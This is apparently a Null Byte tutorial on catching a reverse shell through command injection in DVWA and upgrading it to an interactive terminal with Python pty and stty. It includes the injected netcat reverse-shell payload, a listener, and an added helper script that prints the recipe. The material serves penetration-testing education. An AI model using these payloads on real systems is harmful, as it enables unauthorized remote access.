
Upgrading a Dumb Shell to a Fully Interactive Shell for More Flexibility - Null Byte :: WonderHowTo



One of the most exciting things about being an ethical hacker is, in my opinion, catching a reverse shell. Often, however, these shells are limited because they lack the full power and functionality of a proper terminal. Certain things simply do not work in these environments, which makes them awkward to work with. Fortunately, with a few commands, we can upgrade to a fully interactive shell with all the bells and whistles.

Working with reverse shells can be frustrating if all you have is a "dumb" shell. A dumb shell is a shell that is not attached to a terminal (a TTY), so it lacks the functionality of a proper terminal session. This means that things like tab completion, keyboard shortcuts, and command history simply do not exist.

Certain commands like su and sudo refuse to run without a terminal, and text editors such as vi or nano do not work well under these conditions either, which can be painful.

Perhaps the most annoying thing that can happen (I'm sure it has happened to many of you) is accidentally losing your session by pressing the wrong key. Suppose you execute a command that hangs, and you instinctively press Control-C to abort it. Since the keystroke is interpreted by your local terminal rather than passed to the remote shell, it kills the Netcat listener, and there goes your shell. That is especially annoying if it took a lot of steps to get the shell in the first place.

However, with a bit of command-line magic, we can work around these limitations and end up with a fully functional interactive shell.

Step 1: Obtain a Dumb Shell

To begin, we use command injection to get our initial shell. For demonstration, we use DVWA (Damn Vulnerable Web App), but any similar test setup will do. Navigate to DVWA and sign in with the default credentials.

Next, go to the DVWA Security page and change the security level to Low. This ensures that the command injection works without any filtering getting in the way.

Now we can launch a listener on Kali with Netcat to catch the incoming connection to our machine. The flags can be grouped as -lvp, where -l starts a listener, -v makes the output verbose, and -p specifies the port to listen on (1234 in this exercise).

  ~# nc -lvp 1234

listening on [any] 1234 ...

In DVWA, navigate to the "Command Execution" page. It is meant to let us run a single system command, pinging an IP address, but the input is passed to the shell unfiltered, so we can chain our own command onto it.

The full payload is listed below. The && after the (valid) ping target makes the server run our second command, which tells the target to connect back to our machine on port 1234 with Netcat and hand it a bash shell via -e. Note that -e only exists in some Netcat builds (netcat-traditional, Ncat); the OpenBSD variant shipped by many distributions does not support it, so check which one the target has if the payload fails silently.

  localhost && nc 10.10.0.1 1234 -e /bin/bash

Once we click "Submit", we should see a connection open on our listener. No prompt is displayed, only a blinking cursor.

  10.10.0.50: inverse host lookup failed: Unknown host
connect to [10.10.0.1] from (UNKNOWN) [10.10.0.50] 52685

This is how many shells look, especially ones obtained through a web application. Running a command like id confirms that the shell works; we are executing as the web server user.

  id

uid=33(www-data) gid=33(www-data) groups=33(www-data)

Step 2: Spawn a Bash Shell with a PTY

One of the simplest and most reliable ways to upgrade a dumb shell to a proper terminal session is with Python. If the target is a Linux box, it will very likely have some version of Python installed.

First, check whether Python is installed, and where, with the which command.

  which python

/usr/bin/python

Usually either python or python3 is present (try both). Now we can use it to spawn a bash shell attached to a pseudo-terminal. Below, the -c flag tells Python to execute the string that follows. It first imports the pty module, which provides pseudo-terminal functions; a PTY is what commands like su need in order to run. Then pty.spawn() starts bash inside that pseudo-terminal, and after pressing Enter we should see a real command prompt.

  python -c 'import pty; pty.spawn("/bin/bash")'

www-data@metasploitable:/var/www/dvwa/vulnerabilities/exec$

Well, that's a little better, but we still have no tab completion or command history, and pressing Control-C will still kill the session, because the keystroke is handled by our local terminal rather than sent to the remote one. Next, we'll upgrade to a fully functional shell with a little terminal fu.

Step 3: Upgrade to Interactive Shell

The next thing we need to do is not intuitive: background the shell with Control-Z. This suspends the Netcat process on our local machine (the remote shell stays connected) and drops us back to our local prompt.

  www-data@metasploitable:/var/www/dvwa/vulnerabilities/exec$ ^Z

[1]+  Stopped                 nc -lvp 1234
root@drd:~#

We now need some information about our own local terminal so we can mirror it on the remote side. Use echo to display the current terminal type.

  ~# echo $TERM

xterm-256color

Enter stty -a to display the current terminal settings.

  ~# stty -a

speed 38400 baud; rows 56; columns 213; line = 0;
intr = ^C; quit = ^\; erase = ^?; kill = ^U; eof = ^D; eol = <undef>; eol2 = <undef>; swtch = <undef>; start = ^Q; stop = ^S; susp = ^Z; rprnt = ^R; werase = ^W; lnext = ^V; discard = ^O; min = 1; time = 0;
-parenb -parodd -cmspar cs8 -hupcl -cstopb cread -clocal -crtscts
-ignbrk -brkint -ignpar -parmrk -inpck -istrip -inlcr -igncr -icrnl ixon -ixoff -iuclc -ixany -imaxbel iutf8
opost -olcuc -ocrnl onlcr -onocr -onlret -ofill -ofdel nl0 cr0 tab0 bs0 vt0 ff0
isig icanon iexten echo echoe echok -echonl -noflsh -xcase -tostop -echoprt echoctl echoke -flusho -extproc

Make note of the number of rows and columns. Next, enter the following command. It switches our local terminal to raw mode, so that keystrokes such as Control-C, Control-Z, Tab and the arrow keys are passed straight through Netcat to the remote shell instead of being interpreted locally, and -echo turns off local echo, since the remote pseudo-terminal will echo what we type.

  ~# stty raw -echo

Now type fg to bring the backgrounded Netcat session to the foreground. You will not see the letters on the screen as you type, because echo is now off, but press Enter anyway; the shell will print the Netcat command line as the job resumes. Next, type reset to reinitialize the terminal. It looks odd while you type it, but it works. (Many people type both on one line, stty raw -echo; fg, so there is nothing to type blind.)

  ~# nc -lvp 1234
reset

You may be prompted for the terminal type. Sometimes the target does not know the 256-color variant of xterm, so we can simply answer with plain xterm instead.

  reset: unknown terminal type unknown
Terminal type? xterm-256color

reset: unknown terminal type xterm-256color
Terminal type? xterm

If you still cannot clear the screen or use the up arrow to browse history, use the following commands in the remote shell to set the terminal type and shell explicitly.

  www-data@metasploitable:/var/www/dvwa/vulnerabilities/exec$ export TERM=xterm
www-data@metasploitable:/var/www/dvwa/vulnerabilities/exec$ export SHELL=bash

Now all that remains is to set the correct terminal size. The remote pseudo-terminal defaults to a small size, so when we are deep in a directory tree or have a long prompt, output wraps and becomes hard to read. By setting the rows and columns to the same values as our local terminal (the ones we noted from stty -a), we avoid this.

  www-data@metasploitable:/var/www/dvwa/vulnerabilities/exec$ stty rows 56 columns 213

We now have a fully interactive shell that lets us use keyboard shortcuts, clear the screen, browse command history, and use all the features of our favorite local terminal over a plain Netcat connection. One caveat: when the remote session eventually ends, our local terminal is still in raw mode with echo off, so type reset (or stty sane) blind at the local prompt to restore it.
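As an added example (not part of the original article), the following POSIX shell helper generates the exact lines from Steps 2 and 3 so that the terminal type and the rows/columns read off the local stty -a do not have to be retyped by hand. It assumes the interpreter name found with which on the target is passed in, and falls back to 24x80 when it is run without a controlling terminal; both assumptions are marked in the comments.

```shell
#!/bin/sh
# Added example, not from the original article: print the commands needed to
# upgrade a dumb shell, filled in from the attacker's own terminal settings.

# Step 2 one-liner for a given Python interpreter name (whatever "which
# python" or "which python3" returned on the target).
pty_spawn_cmd() {
    printf '%s -c '\''import pty; pty.spawn("/bin/bash")'\''\n' "$1"
}

# Step 3 lines typed into the remote shell after "reset".
# $1 rows, $2 columns, $3 terminal type. When no TERM is given, plain xterm
# is used, since the target's terminfo may not know fancier variants.
remote_fixup_cmds() {
    rows=$1; cols=$2; term=${3:-xterm}
    for v in "$rows" "$cols"; do
        case "$v" in
            ""|*[!0-9]*) echo "rows and columns must be numeric" >&2; return 1 ;;
        esac
    done
    printf 'export TERM=%s\n' "$term"
    printf 'export SHELL=bash\n'
    printf 'stty rows %s columns %s\n' "$rows" "$cols"
}

# Local terminal geometry; "stty size" prints "rows cols". Assumption: when
# there is no controlling terminal (e.g. run from a script), use 24x80.
local_tty_size() {
    size=$(stty size </dev/tty 2>/dev/null) || size="24 80"
    printf '%s\n' "$size"
}

# Whole recipe, in the order the article performs it. $1 is the interpreter
# name found on the target (default: python).
print_recipe() {
    py=${1:-python}
    echo "# on the target, after catching the shell:"
    pty_spawn_cmd "$py"
    echo "# locally: Control-Z to background nc, then type (blind):"
    echo "stty raw -echo; fg"
    echo "# on the target again:"
    echo "reset"
    set -- $(local_tty_size)
    remote_fixup_cmds "$1" "$2" "${TERM:-xterm}"
}
```

Run it as `. ./upgrade.sh; print_recipe python3` on the attacking machine and paste each block where the comment says; the rows and columns come from your current window, so resize the window first if you want a different layout on the remote side.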

Summary

Today we learned about dumb shells, their limitations, and what can go wrong when using them. First, we obtained an initial shell via command injection. We then used Python to spawn a bash shell inside a pseudo-terminal, and finally mirrored our local terminal settings onto it to upgrade to a fully interactive shell. With this technique, you can now catch reverse shells in style.

Cover photo by Tatiana Shepeleva / 123RF; Screenshots of drd_ / zero byte
